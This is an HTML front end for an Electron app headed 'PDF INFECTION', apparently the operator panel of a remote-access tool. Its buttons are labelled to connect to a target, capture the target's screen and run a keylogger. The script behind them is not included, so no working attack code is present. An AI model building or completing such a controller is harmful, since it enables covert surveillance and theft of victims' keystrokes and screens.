<html>
  <head>
    <meta charset="UTF-8">
    <title>Inerface</title>
    <!-- https://electronjs.org/docs/tutorial/security#csp-meta-tag -->
    <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'unsafe-inline';" />
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
    </head>

  <body>
    <div class="container">
      <div class="jumbotron" style="text-align: center;">
        <h3>PDF INFECTION</h3>
        <p></p>
      </div>
      <div class="row">
        <div class="col-sm-6" id="buttons">
          <button class="btn btn-info btn-block" id="connect" style="margin-top: 1em;">
            Connect to the target
          </button>
          <br/>
          <button class="btn btn-info btn-block" id="screen" style="margin-top: 1em;">
            Get Screen
          </button>
          <br/>
          <button class="btn btn-info btn-block" id="keylog" style="margin-top: 1em;">
            Keylogger
          </button>
        </div>
        <div class="col-sm-6" id="result" style="padding: 3px 3px 3px 3px; border: 1px solid salmon;">

        </div>
      </div>
    </div>
  </body>
  <script src="./app.js"></script>
</html>
